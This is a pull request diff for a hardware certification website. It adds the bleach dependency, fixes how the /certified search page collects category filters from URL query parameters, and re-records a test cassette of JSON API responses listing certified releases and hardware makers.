### PR TITLE
Parse query params for /certified

### DIFF
--- a/requirements.txt
+++ b/requirements.txt
@@ -28,3 +28,4 @@ google-cloud-datastore==2.16.1
 django-openid-auth==0.17
 time-machine==2.9.0
 filelock==3.12.0
+bleach==6.0.0

--- a/static/js/src/certified-search-results.js
+++ b/static/js/src/certified-search-results.js
@@ -43,16 +43,16 @@ function retrieveSelectedFilters() {
   const path = window.location.pathname;
   const pathCategory = path.replace("/certified/", "");
 
-  let selectedCategories;
+  let selectedCategories = [];
   let selectedVendors = urlParams.getAll("vendor");
   let selectedReleases = urlParams.getAll("release");
 
   if (pathCategory !== "/certified") {
-    selectedCategories = urlParams.getAll("category").push(pathCategory);
+    selectedCategories = urlParams.getAll("category");
+    selectedCategories.push(pathCategory);
   } else {
     selectedCategories = urlParams.getAll("category");
   }
-
   return {
     category: selectedCategories,
     vendor: selectedVendors,

--- a/tests/cassettes/TestCertification.test_filters_json.yaml
+++ b/tests/cassettes/TestCertification.test_filters_json.yaml
@@ -15,50 +15,48 @@ interactions:
   response:
     body:
       string: '{"meta": {"limit": 1000, "next": null, "offset": 0, "previous": null,
-        "total_count": 8}, "objects": [{"desktops": 199, "laptops": 442, "release":
-        "20.04 LTS", "resource_uri": "/api/v1/certifiedreleases/20.04%20LTS/", "servers":
-        398, "smart_core": 46, "soc": 5, "total": 1097}, {"desktops": 0, "laptops":
-        0, "release": "Core 20", "resource_uri": "/api/v1/certifiedreleases/Core%2020/",
-        "servers": 0, "smart_core": 26, "soc": 0, "total": 26}, {"desktops": 0, "laptops":
+        "total_count": 9}, "objects": [{"desktops": 5, "laptops": 0, "release": "Core
+        22", "resource_uri": "/api/v1/certifiedreleases/Core%2022/", "servers": 0,
+        "smart_core": 13, "soc": 0, "total": 18}, {"desktops": 204, "laptops": 431,
+        "release": "20.04 LTS", "resource_uri": "/api/v1/certifiedreleases/20.04%20LTS/",
+        "servers": 437, "smart_core": 45, "soc": 5, "total": 1142}, {"desktops": 0,
+        "laptops": 0, "release": "Core 20", "resource_uri": "/api/v1/certifiedreleases/Core%2020/",
+        "servers": 0, "smart_core": 26, "soc": 0, "total": 26}, {"desktops": 2, "laptops":
         0, "release": "Core 18", "resource_uri": "/api/v1/certifiedreleases/Core%2018/",
-        "servers": 0, "smart_core": 16, "soc": 0, "total": 16}, {"desktops": 115,
-        "laptops": 258, "release": "18.04 LTS", "resource_uri": "/api/v1/certifiedreleases/18.04%20LTS/",
-        "servers": 400, "smart_core": 10, "soc": 10, "total": 795}, {"desktops": 0,
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 7}, {"desktops": 115, "laptops":
+        254, "release": "18.04 LTS", "resource_uri": "/api/v1/certifiedreleases/18.04%20LTS/",
+        "servers": 396, "smart_core": 6, "soc": 10, "total": 791}, {"desktops": 0,
         "laptops": 0, "release": "18.04", "resource_uri": "/api/v1/certifiedreleases/18.04/",
         "servers": 2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 2, "laptops":
         0, "release": "16.04 LTS", "resource_uri": "/api/v1/certifiedreleases/16.04%20LTS/",
-        "servers": 419, "smart_core": 0, "soc": 0, "total": 421}, {"desktops": 0,
+        "servers": 414, "smart_core": 0, "soc": 0, "total": 420}, {"desktops": 0,
         "laptops": 0, "release": "Core 16", "resource_uri": "/api/v1/certifiedreleases/Core%2016/",
-        "servers": 0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 91, "laptops":
-        139, "release": "22.04 LTS", "resource_uri": "/api/v1/certifiedreleases/22.04%20LTS/",
-        "servers": 349, "smart_core": 13, "soc": 0, "total": 602}]}'
+        "servers": 0, "smart_core": 6, "soc": 0, "total": 6}, {"desktops": 115, "laptops":
+        213, "release": "22.04 LTS", "resource_uri": "/api/v1/certifiedreleases/22.04%20LTS/",
+        "servers": 407, "smart_core": 33, "soc": 0, "total": 804}]}'
     headers:
       Cache-Control:
       - no-cache
       Connection:
-      - Keep-Alive
+      - keep-alive
       Content-Length:
-      - '1443'
+      - '1605'
       Content-Type:
       - application/json
       Date:
-      - Fri, 11 Aug 2023 14:22:41 GMT
-      Keep-Alive:
-      - timeout=5, max=100
-      Server:
-      - gunicorn/19.9.0
+      - Fri, 15 Dec 2023 09:10:30 GMT
       Strict-Transport-Security:
-      - max-age=2592000
+      - max-age=15724800; includeSubDomains
       Vary:
-      - Accept,Cookie
+      - Accept, Cookie
       X-QueryInspect-Duplicate-SQL-Queries:
       - '0'
       X-QueryInspect-Num-SQL-Queries:
       - '2'
       X-QueryInspect-Total-Request-Time:
-      - 104 ms
+      - 100 ms
       X-QueryInspect-Total-SQL-Time:
-      - 97 ms
+      - 86 ms
     status:
       code: 200
       message: OK
@@ -78,127 +76,344 @@ interactions:
   response:
     body:
       string: '{"meta": {"limit": 1000, "next": null, "offset": 0, "previous": null,
-        "total_count": 46}, "objects": [{"desktops": 139, "laptops": 465, "make":
-        "Dell", "resource_uri": "/api/v1/certifiedmakes/Dell/", "servers": 2, "smart_core":
-        8, "soc": 0, "total": 621}, {"desktops": 115, "laptops": 198, "make": "Lenovo",
-        "resource_uri": "/api/v1/certifiedmakes/Lenovo/", "servers": 96, "smart_core":
-        3, "soc": 0, "total": 413}, {"desktops": 113, "laptops": 141, "make": "HP",
-        "resource_uri": "/api/v1/certifiedmakes/HP/", "servers": 0, "smart_core":
-        0, "soc": 0, "total": 257}, {"desktops": 0, "laptops": 0, "make": "Supermicro",
+        "total_count": 52}, "objects": [{"desktops": 139, "laptops": 457, "make":
+        "Dell", "resource_uri": "/api/v1/certifiedmakes/Dell/", "servers": 4, "smart_core":
+        7, "soc": 0, "total": 631}, {"desktops": 124, "laptops": 241, "make": "Lenovo",
+        "resource_uri": "/api/v1/certifiedmakes/Lenovo/", "servers": 102, "smart_core":
+        5, "soc": 0, "total": 488}, {"desktops": 129, "laptops": 161, "make": "HP",
+        "resource_uri": "/api/v1/certifiedmakes/HP/", "servers": 2, "smart_core":
+        0, "soc": 0, "total": 305}, {"desktops": 0, "laptops": 0, "make": "Supermicro",
         "resource_uri": "/api/v1/certifiedmakes/Supermicro/", "servers": 152, "smart_core":
         0, "soc": 0, "total": 152}, {"desktops": 0, "laptops": 0, "make": "Dell Technologies",
         "resource_uri": "/api/v1/certifiedmakes/Dell%20Technologies/", "servers":
-        121, "smart_core": 0, "soc": 0, "total": 121}, {"desktops": 0, "laptops":
+        119, "smart_core": 0, "soc": 0, "total": 119}, {"desktops": 0, "laptops":
         0, "make": "HPE", "resource_uri": "/api/v1/certifiedmakes/HPE/", "servers":
-        86, "smart_core": 0, "soc": 0, "total": 86}, {"desktops": 0, "laptops": 0,
+        90, "smart_core": 0, "soc": 0, "total": 90}, {"desktops": 0, "laptops": 0,
         "make": "IBM", "resource_uri": "/api/v1/certifiedmakes/IBM/", "servers": 79,
         "smart_core": 0, "soc": 0, "total": 79}, {"desktops": 0, "laptops": 0, "make":
         "ASUSTeK Computer Inc.", "resource_uri": "/api/v1/certifiedmakes/ASUSTeK%20Computer%20Inc./",
-        "servers": 65, "smart_core": 1, "soc": 0, "total": 66}, {"desktops": 0, "laptops":
+        "servers": 71, "smart_core": 1, "soc": 0, "total": 72}, {"desktops": 0, "laptops":
         0, "make": "Huawei Technologies Co., Ltd.", "resource_uri": "/api/v1/certifiedmakes/Huawei%20Technologies%20Co.,%20Ltd./",
         "servers": 53, "smart_core": 0, "soc": 6, "total": 59}, {"desktops": 0, "laptops":
+        0, "make": "QUANTA Computer Inc", "resource_uri": "/api/v1/certifiedmakes/QUANTA%20Computer%20Inc/",
+        "servers": 57, "smart_core": 0, "soc": 0, "total": 57}, {"desktops": 0, "laptops":
         0, "make": "Fujitsu Limited.", "resource_uri": "/api/v1/certifiedmakes/Fujitsu%20Limited./",
         "servers": 56, "smart_core": 0, "soc": 0, "total": 56}, {"desktops": 0, "laptops":
-        0, "make": "QUANTA Computer Inc", "resource_uri": "/api/v1/certifiedmakes/QUANTA%20Computer%20Inc/",
-        "servers": 54, "smart_core": 0, "soc": 0, "total": 54}, {"desktops": 0, "laptops":
         0, "make": "Cisco UCS", "resource_uri": "/api/v1/certifiedmakes/Cisco%20UCS/",
-        "servers": 49, "smart_core": 0, "soc": 0, "total": 49}, {"desktops": 0, "laptops":
+        "servers": 54, "smart_core": 0, "soc": 0, "total": 54}, {"desktops": 0, "laptops":
         0, "make": "New H3C Technologies Co., Ltd", "resource_uri": "/api/v1/certifiedmakes/New%20H3C%20Technologies%20Co.,%20Ltd/",
-        "servers": 44, "smart_core": 0, "soc": 0, "total": 44}, {"desktops": 0, "laptops":
+        "servers": 51, "smart_core": 0, "soc": 0, "total": 51}, {"desktops": 0, "laptops":
         0, "make": "NEC Corporation", "resource_uri": "/api/v1/certifiedmakes/NEC%20Corporation/",
         "servers": 34, "smart_core": 0, "soc": 0, "total": 34}, {"desktops": 0, "laptops":
         0, "make": "Inspur Electronic Information Industry Co., Ltd.", "resource_uri":
         "/api/v1/certifiedmakes/Inspur%20Electronic%20Information%20Industry%20Co.,%20Ltd./",
-        "servers": 29, "smart_core": 0, "soc": 0, "total": 29}, {"desktops": 0, "laptops":
+        "servers": 33, "smart_core": 0, "soc": 0, "total": 33}, {"desktops": 0, "laptops":
         0, "make": "xFusion Digital Technologies Co., Ltd.", "resource_uri": "/api/v1/certifiedmakes/xFusion%20Digital%20Technologies%20Co.,%20Ltd./",
-        "servers": 18, "smart_core": 0, "soc": 0, "total": 18}, {"desktops": 0, "laptops":
-        0, "make": "Giga Computing", "resource_uri": "/api/v1/certifiedmakes/Giga%20Computing/",
-        "servers": 17, "smart_core": 0, "soc": 0, "total": 17}, {"desktops": 0, "laptops":
+        "servers": 23, "smart_core": 0, "soc": 0, "total": 23}, {"desktops": 0, "laptops":
         0, "make": "ADVANTECH", "resource_uri": "/api/v1/certifiedmakes/ADVANTECH/",
-        "servers": 0, "smart_core": 17, "soc": 0, "total": 17}, {"desktops": 5, "laptops":
+        "servers": 0, "smart_core": 20, "soc": 0, "total": 20}, {"desktops": 0, "laptops":
+        0, "make": "Giga Computing", "resource_uri": "/api/v1/certifiedmakes/Giga%20Computing/",
+        "servers": 18, "smart_core": 0, "soc": 0, "total": 18}, {"desktops": 0, "laptops":
+        0, "make": "IEIT SYSTEMS Co.,Ltd.", "resource_uri": "/api/v1/certifiedmakes/IEIT%20SYSTEMS%20Co.,Ltd./",
+        "servers": 17, "smart_core": 0, "soc": 0, "total": 17}, {"desktops": 0, "laptops":
         0, "make": "Raspberry Pi Foundation", "resource_uri": "/api/v1/certifiedmakes/Raspberry%20Pi%20Foundation/",
-        "servers": 0, "smart_core": 12, "soc": 0, "total": 17}, {"desktops": 0, "laptops":
+        "servers": 0, "smart_core": 15, "soc": 0, "total": 15}, {"desktops": 0, "laptops":
         0, "make": "Ericsson, Inc.", "resource_uri": "/api/v1/certifiedmakes/Ericsson,%20Inc./",
         "servers": 11, "smart_core": 0, "soc": 0, "total": 11}, {"desktops": 0, "laptops":
         0, "make": "Kontron", "resource_uri": "/api/v1/certifiedmakes/Kontron/", "servers":
-        7, "smart_core": 0, "soc": 0, "total": 7}, {"desktops": 0, "laptops": 0, "make":
+        7, "smart_core": 0, "soc": 0, "total": 7}, {"desktops": 2, "laptops": 0, "make":
         "Intel Corp.", "resource_uri": "/api/v1/certifiedmakes/Intel%20Corp./", "servers":
-        0, "smart_core": 6, "soc": 0, "total": 6}, {"desktops": 0, "laptops": 0, "make":
-        "Cavium, Inc.", "resource_uri": "/api/v1/certifiedmakes/Cavium,%20Inc./",
+        0, "smart_core": 4, "soc": 0, "total": 6}, {"desktops": 0, "laptops": 0, "make":
+        "nVidia", "resource_uri": "/api/v1/certifiedmakes/nVidia/", "servers": 4,
+        "smart_core": 0, "soc": 0, "total": 5}, {"desktops": 2, "laptops": 0, "make":
+        "Xilinx", "resource_uri": "/api/v1/certifiedmakes/Xilinx/", "servers": 0,
+        "smart_core": 3, "soc": 0, "total": 5}, {"desktops": 0, "laptops": 0, "make":
+        "AAEON Technology Inc.", "resource_uri": "/api/v1/certifiedmakes/AAEON%20Technology%20Inc./",
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 0, "laptops":
+        0, "make": "ADLink Technology, Inc.", "resource_uri": "/api/v1/certifiedmakes/ADLink%20Technology,%20Inc./",
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 0, "laptops":
+        0, "make": "Cavium, Inc.", "resource_uri": "/api/v1/certifiedmakes/Cavium,%20Inc./",
         "servers": 3, "smart_core": 0, "soc": 2, "total": 5}, {"desktops": 0, "laptops":
-        0, "make": "Xilinx", "resource_uri": "/api/v1/certifiedmakes/Xilinx/", "servers":
-        0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 0, "laptops": 0, "make":
+        0, "make": "DFI", "resource_uri": "/api/v1/certifiedmakes/DFI/", "servers":
+        0, "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
         "OnLogic", "resource_uri": "/api/v1/certifiedmakes/OnLogic/", "servers": 0,
         "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
-        "DFI", "resource_uri": "/api/v1/certifiedmakes/DFI/", "servers": 0, "smart_core":
-        4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make": "nVidia",
-        "resource_uri": "/api/v1/certifiedmakes/nVidia/", "servers": 3, "smart_core":
-        0, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make": "AAEON Technology
-        Inc.", "resource_uri": "/api/v1/certifiedmakes/AAEON%20Technology%20Inc./",
-        "servers": 0, "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops":
-        0, "make": "Honeywell, Inc.", "resource_uri": "/api/v1/certifiedmakes/Honeywell,%20Inc./",
+        "Rigado", "resource_uri": "/api/v1/certifiedmakes/Rigado/", "servers": 0,
+        "smart_core": 4, "soc": 0, "total": 4}, {"desktops": 0, "laptops": 0, "make":
+        "Eurotech", "resource_uri": "/api/v1/certifiedmakes/Eurotech/", "servers":
+        0, "smart_core": 3, "soc": 0, "total": 3}, {"desktops": 0, "laptops": 0, "make":
+        "Honeywell, Inc.", "resource_uri": "/api/v1/certifiedmakes/Honeywell,%20Inc./",
         "servers": 0, "smart_core": 3, "soc": 0, "total": 3}, {"desktops": 0, "laptops":
-        0, "make": "Mellanox Technologies", "resource_uri": "/api/v1/certifiedmakes/Mellanox%20Technologies/",
+        0, "make": "Fujitsu", "resource_uri": "/api/v1/certifiedmakes/Fujitsu/", "servers":
+        3, "smart_core": 0, "soc": 0, "total": 3}, {"desktops": 0, "laptops": 0, "make":
+        "Mellanox Technologies", "resource_uri": "/api/v1/certifiedmakes/Mellanox%20Technologies/",
         "servers": 0, "smart_core": 1, "soc": 0, "total": 3}, {"desktops": 0, "laptops":
-        0, "make": "ASRock Industrial", "resource_uri": "/api/v1/certifiedmakes/ASRock%20Industrial/",
-        "servers": 0, "smart_core": 2, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
         0, "make": "Penguin Computing", "resource_uri": "/api/v1/certifiedmakes/Penguin%20Computing/",
         "servers": 2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
-        0, "make": "Ampere Computing, LLC", "resource_uri": "/api/v1/certifiedmakes/Ampere%20Computing,%20LLC/",
-        "servers": 0, "smart_core": 0, "soc": 2, "total": 2}, {"desktops": 0, "laptops":
-        0, "make": "Eurotech", "resource_uri": "/api/v1/certifiedmakes/Eurotech/",
+        0, "make": "ASRock Industrial", "resource_uri": "/api/v1/certifiedmakes/ASRock%20Industrial/",
         "servers": 0, "smart_core": 2, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
         0, "make": "Wiwynn", "resource_uri": "/api/v1/certifiedmakes/Wiwynn/", "servers":
         2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops": 0, "make":
-        "GIGA-BYTE TECHNOLOGY CO., LTD.", "resource_uri": "/api/v1/certifiedmakes/GIGA-BYTE%20TECHNOLOGY%20CO.,%20LTD./",
-        "servers": 2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
-        0, "make": "ADLink Technology, Inc.", "resource_uri": "/api/v1/certifiedmakes/ADLink%20Technology,%20Inc./",
-        "servers": 0, "smart_core": 2, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
-        0, "make": "Fujitsu", "resource_uri": "/api/v1/certifiedmakes/Fujitsu/", "servers":
-        2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 0, "laptops": 0, "make":
-        "Interactive Strength Inc", "resource_uri": "/api/v1/certifiedmakes/Interactive%20Strength%20Inc/",
-        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
-        0, "make": "Avnet IoT Gateway", "resource_uri": "/api/v1/certifiedmakes/Avnet%20IoT%20Gateway/",
-        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
-        0, "make": "ZTE", "resource_uri": "/api/v1/certifiedmakes/ZTE/", "servers":
-        1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
-        "Element Biosciences", "resource_uri": "/api/v1/certifiedmakes/Element%20Biosciences/",
-        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        "Ampere Computing, LLC", "resource_uri": "/api/v1/certifiedmakes/Ampere%20Computing,%20LLC/",
+        "servers": 0, "smart_core": 0, "soc": 2, "total": 2}, {"desktops": 1, "laptops":
+        0, "make": "Dell Computer Corporation", "resource_uri": "/api/v1/certifiedmakes/Dell%20Computer%20Corporation/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 2}, {"desktops": 0, "laptops":
+        0, "make": "GIGA-BYTE TECHNOLOGY CO., LTD.", "resource_uri": "/api/v1/certifiedmakes/GIGA-BYTE%20TECHNOLOGY%20CO.,%20LTD./",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
         0, "make": "FETCi", "resource_uri": "/api/v1/certifiedmakes/FETCi/", "servers":
         1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
-        "Rigado", "resource_uri": "/api/v1/certifiedmakes/Rigado/", "servers": 0,
-        "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
-        "Axiomtek", "resource_uri": "/api/v1/certifiedmakes/Axiomtek/", "servers":
+        "Tyrone Systems", "resource_uri": "/api/v1/certifiedmakes/Tyrone%20Systems/",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Avnet IoT Gateway", "resource_uri": "/api/v1/certifiedmakes/Avnet%20IoT%20Gateway/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 1, "laptops":
+        0, "make": "IEI", "resource_uri": "/api/v1/certifiedmakes/IEI/", "servers":
+        0, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
+        "ZTE", "resource_uri": "/api/v1/certifiedmakes/ZTE/", "servers": 1, "smart_core":
+        0, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make": "Axiomtek",
+        "resource_uri": "/api/v1/certifiedmakes/Axiomtek/", "servers": 0, "smart_core":
+        1, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make": "Open Compute
+        Project", "resource_uri": "/api/v1/certifiedmakes/Open%20Compute%20Project/",
+        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "InoNet Computer GmbH", "resource_uri": "/api/v1/certifiedmakes/InoNet%20Computer%20GmbH/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Element Biosciences", "resource_uri": "/api/v1/certifiedmakes/Element%20Biosciences/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops":
+        0, "make": "Asus", "resource_uri": "/api/v1/certifiedmakes/Asus/", "servers":
         0, "smart_core": 1, "soc": 0, "total": 1}, {"desktops": 0, "laptops": 0, "make":
-        "Open Compute Project", "resource_uri": "/api/v1/certifiedmakes/Open%20Compute%20Project/",
-        "servers": 1, "smart_core": 0, "soc": 0, "total": 1}]}'
+        "Interactive Strength Inc", "resource_uri": "/api/v1/certifiedmakes/Interactive%20Strength%20Inc/",
+        "servers": 0, "smart_core": 1, "soc": 0, "total": 1}]}'
     headers:
       Cache-Control:
       - no-cache
       Connection:
-      - Keep-Alive
+      - keep-alive
       Content-Length:
-      - '8037'
+      - '9068'
       Content-Type:
       - application/json
       Date:
-      - Fri, 11 Aug 2023 14:22:41 GMT
-      Keep-Alive:
-      - timeout=5, max=99
-      Server:
-      - gunicorn/19.9.0
+      - Fri, 15 Dec 2023 09:10:30 GMT
       Strict-Transport-Security:
-      - max-age=2592000
+      - max-age=15724800; includeSubDomains
       Vary:
-      - Accept,Cookie
+      - Accept, Cookie
       X-QueryInspect-Duplicate-SQL-Queries:
       - '0'
       X-QueryInspect-Num-SQL-Queries:
       - '2'
       X-QueryInspect-Total-Request-Time:
-      - 100 ms
+      - 137 ms
       X-QueryInspect-Total-SQL-Time:
-      - 81 ms
+      - 98 ms
+    status:
+      code: 200
+      message: OK
+- request:
+    body: null
+    headers:
+      Accept:
+      - '*/*'
+      Accept-Encoding:
+      - gzip, deflate
+      Connection:
+      - keep-alive
+      User-Agent:
+      - python-requests/2.28.2
+    method: GET
+    uri: https://certification.canonical.com/api/v1/certifiedreleases/?format=json&limit=0
+  response:
+    body:
+      string: '{"meta": {"limit": 1000, "next": null, "offset": 0, "previous": null,
+        "total_count": 9}, "objects": [{"desktops": 5, "laptops": 0, "release": "Core
+        22", "resource_uri": "/api/v1/certifiedreleases/Core%2022/", "servers": 0,
+        "smart_core": 13, "soc": 0, "total": 18}, {"desktops": 204, "laptops": 431,
+        "release": "20.04 LTS", "resource_uri": "/api/v1/certifiedreleases/20.04%20LTS/",
+        "servers": 437, "smart_core": 45, "soc": 5, "total": 1142}, {"desktops": 0,
+        "laptops": 0, "release": "Core 20", "resource_uri": "/api/v1/certifiedreleases/Core%2020/",
+        "servers": 0, "smart_core": 26, "soc": 0, "total": 26}, {"desktops": 2, "laptops":
+        0, "release": "Core 18", "resource_uri": "/api/v1/certifiedreleases/Core%2018/",
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 7}, {"desktops": 115, "laptops":
+        254, "release": "18.04 LTS", "resource_uri": "/api/v1/certifiedreleases/18.04%20LTS/",
+        "servers": 396, "smart_core": 6, "soc": 10, "total": 791}, {"desktops": 0,
+        "laptops": 0, "release": "18.04", "resource_uri": "/api/v1/certifiedreleases/18.04/",
+        "servers": 2, "smart_core": 0, "soc": 0, "total": 2}, {"desktops": 2, "laptops":
+        0, "release": "16.04 LTS", "resource_uri": "/api/v1/certifiedreleases/16.04%20LTS/",
+        "servers": 414, "smart_core": 0, "soc": 0, "total": 420}, {"desktops": 0,
+        "laptops": 0, "release": "Core 16", "resource_uri": "/api/v1/certifiedreleases/Core%2016/",
+        "servers": 0, "smart_core": 6, "soc": 0, "total": 6}, {"desktops": 115, "laptops":
+        213, "release": "22.04 LTS", "resource_uri": "/api/v1/certifiedreleases/22.04%20LTS/",
+        "servers": 407, "smart_core": 33, "soc": 0, "total": 804}]}'
+    headers:
+      Cache-Control:
+      - no-cache
+      Connection:
+      - keep-alive
+      Content-Length:
+      - '1605'
+      Content-Type:
+      - application/json
+      Date:
+      - Fri, 15 Dec 2023 09:10:30 GMT
+      Strict-Transport-Security:
+      - max-age=15724800; includeSubDomains
+      Vary:
+      - Accept, Cookie
+      X-QueryInspect-Duplicate-SQL-Queries:
+      - '0'
+      X-QueryInspect-Num-SQL-Queries:
+      - '2'
+      X-QueryInspect-Total-Request-Time:
+      - 101 ms
+      X-QueryInspect-Total-SQL-Time:
+      - 93 ms
+    status:
+      code: 200
+      message: OK
+- request:
+    body: null
+    headers:
+      Accept:
+      - '*/*'
+      Accept-Encoding:
+      - gzip, deflate
+      Connection:
+      - keep-alive
+      User-Agent:
+      - python-requests/2.28.2
+    method: GET
+    uri: https://certification.canonical.com/api/v1/certifiedmakes/?format=json&limit=0
+  response:
+    body:
+      string: '{"meta": {"limit": 1000, "next": null, "offset": 0, "previous": null,
+        "total_count": 52}, "objects": [{"desktops": 139, "laptops": 457, "make":
+        "Dell", "resource_uri": "/api/v1/certifiedmakes/Dell/", "servers": 4, "smart_core":
+        7, "soc": 0, "total": 631}, {"desktops": 124, "laptops": 241, "make": "Lenovo",
+        "resource_uri": "/api/v1/certifiedmakes/Lenovo/", "servers": 102, "smart_core":
+        5, "soc": 0, "total": 488}, {"desktops": 129, "laptops": 161, "make": "HP",
+        "resource_uri": "/api/v1/certifiedmakes/HP/", "servers": 2, "smart_core":
+        0, "soc": 0, "total": 305}, {"desktops": 0, "laptops": 0, "make": "Supermicro",
+        "resource_uri": "/api/v1/certifiedmakes/Supermicro/", "servers": 152, "smart_core":
+        0, "soc": 0, "total": 152}, {"desktops": 0, "laptops": 0, "make": "Dell Technologies",
+        "resource_uri": "/api/v1/certifiedmakes/Dell%20Technologies/", "servers":
+        119, "smart_core": 0, "soc": 0, "total": 119}, {"desktops": 0, "laptops":
+        0, "make": "HPE", "resource_uri": "/api/v1/certifiedmakes/HPE/", "servers":
+        90, "smart_core": 0, "soc": 0, "total": 90}, {"desktops": 0, "laptops": 0,
+        "make": "IBM", "resource_uri": "/api/v1/certifiedmakes/IBM/", "servers": 79,
+        "smart_core": 0, "soc": 0, "total": 79}, {"desktops": 0, "laptops": 0, "make":
+        "ASUSTeK Computer Inc.", "resource_uri": "/api/v1/certifiedmakes/ASUSTeK%20Computer%20Inc./",
+        "servers": 71, "smart_core": 1, "soc": 0, "total": 72}, {"desktops": 0, "laptops":
+        0, "make": "Huawei Technologies Co., Ltd.", "resource_uri": "/api/v1/certifiedmakes/Huawei%20Technologies%20Co.,%20Ltd./",
+        "servers": 53, "smart_core": 0, "soc": 6, "total": 59}, {"desktops": 0, "laptops":
+        0, "make": "QUANTA Computer Inc", "resource_uri": "/api/v1/certifiedmakes/QUANTA%20Computer%20Inc/",
+        "servers": 57, "smart_core": 0, "soc": 0, "total": 57}, {"desktops": 0, "laptops":
+        0, "make": "Fujitsu Limited.", "resource_uri": "/api/v1/certifiedmakes/Fujitsu%20Limited./",
+        "servers": 56, "smart_core": 0, "soc": 0, "total": 56}, {"desktops": 0, "laptops":
+        0, "make": "Cisco UCS", "resource_uri": "/api/v1/certifiedmakes/Cisco%20UCS/",
+        "servers": 54, "smart_core": 0, "soc": 0, "total": 54}, {"desktops": 0, "laptops":
+        0, "make": "New H3C Technologies Co., Ltd", "resource_uri": "/api/v1/certifiedmakes/New%20H3C%20Technologies%20Co.,%20Ltd/",
+        "servers": 51, "smart_core": 0, "soc": 0, "total": 51}, {"desktops": 0, "laptops":
+        0, "make": "NEC Corporation", "resource_uri": "/api/v1/certifiedmakes/NEC%20Corporation/",
+        "servers": 34, "smart_core": 0, "soc": 0, "total": 34}, {"desktops": 0, "laptops":
+        0, "make": "Inspur Electronic Information Industry Co., Ltd.", "resource_uri":
+        "/api/v1/certifiedmakes/Inspur%20Electronic%20Information%20Industry%20Co.,%20Ltd./",
+        "servers": 33, "smart_core": 0, "soc": 0, "total": 33}, {"desktops": 0, "laptops":
+        0, "make": "xFusion Digital Technologies Co., Ltd.", "resource_uri": "/api/v1/certifiedmakes/xFusion%20Digital%20Technologies%20Co.,%20Ltd./",
+        "servers": 23, "smart_core": 0, "soc": 0, "total": 23}, {"desktops": 0, "laptops":
+        0, "make": "ADVANTECH", "resource_uri": "/api/v1/certifiedmakes/ADVANTECH/",
+        "servers": 0, "smart_core": 20, "soc": 0, "total": 20}, {"desktops": 0, "laptops":
+        0, "make": "Giga Computing", "resource_uri": "/api/v1/certifiedmakes/Giga%20Computing/",
+        "servers": 18, "smart_core": 0, "soc": 0, "total": 18}, {"desktops": 0, "laptops":
+        0, "make": "IEIT SYSTEMS Co.,Ltd.", "resource_uri": "/api/v1/certifiedmakes/IEIT%20SYSTEMS%20Co.,Ltd./",
+        "servers": 17, "smart_core": 0, "soc": 0, "total": 17}, {"desktops": 0, "laptops":
+        0, "make": "Raspberry Pi Foundation", "resource_uri": "/api/v1/certifiedmakes/Raspberry%20Pi%20Foundation/",
+        "servers": 0, "smart_core": 15, "soc": 0, "total": 15}, {"desktops": 0, "laptops":
+        0, "make": "Ericsson, Inc.", "resource_uri": "/api/v1/certifiedmakes/Ericsson,%20Inc./",
+        "servers": 11, "smart_core": 0, "soc": 0, "total": 11}, {"desktops": 0, "laptops":
+        0, "make": "Kontron", "resource_uri": "/api/v1/certifiedmakes/Kontron/", "servers":
+        7, "smart_core": 0, "soc": 0, "total": 7}, {"desktops": 2, "laptops": 0, "make":
+        "Intel Corp.", "resource_uri": "/api/v1/certifiedmakes/Intel%20Corp./", "servers":
+        0, "smart_core": 4, "soc": 0, "total": 6}, {"desktops": 0, "laptops": 0, "make":
+        "nVidia", "resource_uri": "/api/v1/certifiedmakes/nVidia/", "servers": 4,
+        "smart_core": 0, "soc": 0, "total": 5}, {"desktops": 2, "laptops": 0, "make":
+        "Xilinx", "resource_uri": "/api/v1/certifiedmakes/Xilinx/", "servers": 0,
+        "smart_core": 3, "soc": 0, "total": 5}, {"desktops": 0, "laptops": 0, "make":
+        "AAEON Technology Inc.", "resource_uri": "/api/v1/certifiedmakes/AAEON%20Technology%20Inc./",
+        "servers": 0, "smart_core": 5, "soc": 0, "total": 5}, {"desktops": 0, "laptops":
